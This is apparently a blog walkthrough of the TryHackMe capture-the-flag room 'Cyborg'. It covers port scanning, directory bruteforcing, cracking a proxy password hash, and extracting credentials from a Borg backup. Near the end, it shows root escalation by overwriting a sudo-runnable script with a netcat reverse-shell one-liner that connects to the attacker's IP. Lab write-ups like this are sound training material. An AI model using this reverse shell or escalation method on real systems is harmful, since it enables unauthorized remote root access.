Tryhackme — Cyborg Writeup

10 min readJan 26, 2021


This is a walkthrough for the Tryhackme room Cyborg. A beginner-friendly and funny box! Credits to fieldraccon, who created this pleasent room. Direct link to the room:

Figure 1: Cyborg icon.

1.0 Reconnaissance

We start with a usual nmap scan to enumerate for open ports with

nmap -sC -sV

where “-sC” stands for default script scan and “-sV” for version scan. The output will reveal two open ports:

Figure 2: Result of a basic nmap scan shows two open ports.

With using the flag “-p-” we do a full nmap scan to confirm our hypothesis, that there are just two open ports. By default, nmap will scan only the top 1000 ports. Furthermore, I’m going to scan for UDP ports with:

nmap -sU -T4

There are no new ports. We have confirmed our assumption: We have two open ports, SSH at port 22 and HTTP at port 80.

Question 1: Scan the machine, how many ports are open?

Question 2:What service is running on port 22?

Question 3: What service is running on port 80?

2.0 Enumeration

Now it is time to enumerate the target system. Our nmap scan (Figure 2) revealed two open ports, one of them is SSH at port 22. SSH, which stands for “Secure Shell”, is a network protocol that enables two computers to communicate and share data. Our nmap scan shows the SSH hostkeys and the version, OpenSSH 7.2p Ubuntu 4ubuntu2.10. It’s always important to enumerate the exact version of a service before proceeding. Let’s google the OpenSSH version we have found:

Figure 3: Google search reveals the Ubuntu release version for OpenSSH 7.2p2–4ubuntu2.10.

The host is therefore most likely running Ubuntu 16.04(Xenial Xerus). Moreover, we can look for the SSH authentication mechanisms by trying to SSH into the box:

Figure 4: SSH authentication mechanism.

Looks like the server accepts passwords for at least some user. Sometimes you have additional or other authentication layer (read more about it: here). We can abrupt the login with Ctrl+C.

During the OpenSSH 7.2p2 enumeration, we will come across a few user enumeration exploits, but they will very unlikely succeed. So, let’s have a look at port 80 and leave SSH as it is for now.

Our nmap scan tells us that the web server is running Apache 2.4.18. When we open up the HTTP server at port 80, we see the default Apache2 Ubuntu page:

Figure 5: Default Apache2 Ubuntu Page.

We can look into the source code for comments (which starts with <! — ) or try to find /robots.txt, /sitemap.xml, etc. files on that web server. A more reliable approach is to directory bruteforce with tools like gobuster, dirb, dirbuster, and so on. I’ll use gobuster, but any other tool will work as well.

gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -t 100

Where “dir” stands for directory bruteforce, “-u” for the URL, “-w” for the wordlist and “-t 100” for 100 threads.

Figure 6: Gobuster directory bruteforce reveals some interesting pathes.

We can ignore /.htaccess, /.hta and /.htpasswd (also /server-status), but especially /admin and /etc looks very interesting! Let’s investigate that further:

Figure 7: Admin panel at /admin.

We have found an Admin Panel of an (admin?) user named ‘Alex’. So we have a possible username there. I like to put my potential usernames into a text file called ‘user.txt’ with

echo "alex" >> /tmp/user.txt

We can also tell that Alex likes to play Piano since he was 5 years old and is interested in music in general. This doesn’t have to be relevant, but we have to observe every little detail before we come to a conclusion. By clicking around and just playing a bit with the application, we will come across some internal chats under /admin/admin.html:

Figure 8: Admin Shoutbox, internal chat.

We found two more potential usernames

echo "josh\nadam" >> /tmp/user.txt

and some important notes of the user Alex. It looks like he tried to set up the squid proxy, but failed to do so. He backupped his “music_archive” and forgot to delete the configuration files. Definition of configuration files[1]:

A configuration file, often shortened to config file, defines the parameters, options, settings and preferences applied to operating systems (OSes), infrastructure devices and applications.

Config files are often overlooked and contains sometimes sensitive informations like credentials. A juicy target for hacker, so it’s worth looking for them. The hint[2] for the user flag points also in this direction:

Have you thought about where the config might be?

We have still this very interesting directory called “/etc”. If you are unfamiliar with Linux/Unix, we’ll do a brief history lesson. In the early days of Unix OS, people wanted to keep some of their files like config files, data files and some other files on their machines. So they implemented a folder to keep all those files and named it “/etc” (which stands for etcetera). Nowadays the meaning of that folder changed, but his name “/etc” hasn’t. It is basically a central location for all of your configuration files and this can be treated as the nerve centre of your Linux/Unix machine[3].

Great reasons to enumerate it:

Figure 9: Contents of /etc folder.

We can observe the folder called “squid” which was mentioned earlier. It is just some sort of proxy, which can be used for your web server. And we can observe that the Ubuntu server is running Apache 2.4.18, which matches with our nmap scan. Let’s write that down and proceed by enumerating the folder.

Figure 10: Contents of /etc/squid.

We find a very interesting file called “passwd”, which most likely contains a passwd and the configuration file for squid called “squid.conf”. Let’s start with squid.conf:

Figure 11: Squid configuration file.

It looks like the squid proxy uses /etc/squid/passwd to do a basic authentication. Let’s open up the password file under /etc/squid/passwd:


It looks like we have the backup file named “music_archive” and the password for it, but in a hashed format. Hashing a password is just a way to encrypt it. For weak credentials, we can try to crack the password using tools like John the Ripper (JTR). I’ll save the password string (right after the colon) into a text file called “pass.txt”. We are going to use the strong wordlist called “rockyou.txt”. The hash itself looks like MD5, but we can leave that part for JTR:

john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
Figure 12: Cracking the hash to obtain the password. The password was redacted.

Now we have the password for the backup file “music_archive”, but we don’t have the file itself. We need to enumerate the target system more to obtain the file. As always, enumeration is key.

When we look around the /admin page again, we can find an interesting file called “archive.tar” (at /admin/archive.tar):

Figure 13: Download the archive.tar file.

This looks like something which could contain our backup file. Let’s download it and copy into our current working directory:

cp /home/kali/Downloads/archive.tar .
tar xf archive.tar

Now we see lots of folder and navigate into them:

Figure 14: Enumerating the archive.tar file.

Since I have no clue yet what this is, I want to look at “README” and “config” at this point:

Figure 15: Investigating the README and config file inside /final_archive.

The readme file revealed something interesting: That this is a Borg Backup repository (and now the name of this room makes sense, Cyborg). And we are provided with the documentation link, let’s open it.

Figure 16: Borg documentation [, called last 25.01.2021, 22:10].

It looks like Borg encrypt files and backups them. We remember that our (possibly admin user) Alex was a music lover, who backupped his files under “music_archive”. Let’s take some time to research how Borg is being used. First of all, we need to install it. I’m using Kali Linux 2020.4 (Debian), you may wish to install it on another device.

Installing the dependencies according to the documentation:

Figure 17: Debian/Ubuntu dependencies for Borg [, called last 25.01.2021, 22:14].

Now we can use the “pip” module of Python to install BorgBackup (we need borgbackup[fuse]):

Figure 18: Installing BorgBackup by using the pip module of Python [, called last 25.01.2021, 22:16].

Verify that you have installed it correctly by using

borg --version
Figure 19: Verfiying the installation of Borg.

If you have never worked with virtualenv before, read this: Python virtualenv explained. It’s pretty easy to use, we have just created a virtual environment for our tool!

Now we have this folder called “data”, which is most likely encrypted. We need to tell borg which password we are going to use for our “music_archive” backup file. Take your time to understand how BorgBackup is working. Hacking is always an art between attacking and researching. By researching or simply reading the documentation file, we find out how to use the passphrase we obtained earlier:

Figure 20: Using passphrases with BorgBackup [, called last at 25.01.2021, 22:20].

Now we can use that command with the passphrase we got earlier:

export BORG_PASSPHRASE='s<redacted>'
Figure 21: Specifying the Borg passphrase.

You can see the Borg commands by using

borg --help

We can see a few interesting commands:

Figure 22: Borg help menu under “borg -h”.

By using the “list” command, we can list the important contents. Let’s use it for the current directory (specified with a dot):

borg list .
Figure 23: Listing the “music_archive” directory with Borg.

And there it is! Our file we were looking for. I’ll simply mount the repository inside the /tmp folder to access it’s content:

mkdir /tmp/pe
borg mount . /tmp/pe
Figure 24: Mounting the Borg repository to /tmp/pe.

And now, we can access it’s content. Let’s navigate into the /tmp/pe folder we have just created.

Figure 25: Contents of “music_archive”.

We have found the user “Alex” inside /home/alex, so we can make the assumption that alex is most likely a valid user inside that machine. Let’s enumerate the folder one by one.

We find a text document called “secret.txt” inside the Desktop folder:

Figure 26: Desktop folder contains a file called ‘secret.txt’.

Very motivating so far, hehe. Let’s enumerate the box further:

Figure 27: Colon-separated credentials of the user ‘Alex’ found inside Document/note.txt.

We recall our enumeration at the beginning ( → SSH possible with user:password). And since we can fairly assume that Alex is an user, we can simply try to login into the box using SSH:

Figure 28: SSH into the box using the credentials we obtained from “music_archive”.

And now we have initial foothold into the machine! The user.txt flag can be found under /home/alex/flag.txt.

3.0 Privilege Escalation

We quickly realize that our initial enumeration of the Ubuntu machine was valueable. We can tell that the host is running Ubuntu 16.04.7 LTS. And we haven’t enumerated all of the backup folder so far. But before we go any further, I always firstly check the privileges with

sudo -l

This will simply list (-l) the user privileges.

Figure 29: Privileges of the user “alex”.

As we can see, the user “alex” can run the file with sudo rights (“ALL: ALL”) without specifying a passwd (“NOPASSWD”). Let’s have a look what’s inside the bash script by using the “cat” command:

cat /etc/mp3backups/

Which shows the following:


sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt
#while IFS= read -r line
# b=$(basename $input)
# echo "$line"
#done < "$input"
while getopts c: flag
case "${flag}" in
c) command=${OPTARG};;
backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"# Where to backup to.
# Create archive filename.
hostname=$(hostname -s)
# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
echo# Backup the files using tar.
tar czf $dest/$archive_file $backup_files
# Print end status message.
echo "Backup finished"
echo $cmd

This looks like a bash script to find different songs on the Linux machine, backup them, printing some output, etc. While we could do some crazy privilege escalation methods, let’s always look for the most simple answer before going further. I’ll navigate into the /etc/mp3backups folder to see if we have write access for

Figure 30: Permissions of the “” file.

We don’t have write permission (which is indicated by the ‘w’ letter), but we own this file. Since this file belongs to “alex”, we can simply edit it as we want. Let’s get the write permission:

chmod +w

And now we can edit it as we want. I don’t want to mess with the previous code, so I’ll simply override it’s content by my own reverse shell. Since we can run this file with sudo rights, we’ll get a reverse shell as root. I’ve a few reverse shell commands in my notes I’m always using, like this one:

mkfifo /tmp/lol;nc your-attacker-IP 4444 </tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

This will simply create a connection back to us. Start a netcat listener at port 4444:

nc -nvlp 4444

And execute the script as sudo (be careful to use the full path of the file):

sudo /etc/mp3backups/
Figure 31: Replacing the contents of “” and executing it as sudo.

Make sure to start the netcat listener before you execute the script.

Figure 32: Reverse shell as root using a netcat listener.

You’ll find the root.txt file under /root/root.txt. Really great machine for beginners. Liked it!




Written by Pentestical

Security Researcher, Pentesting

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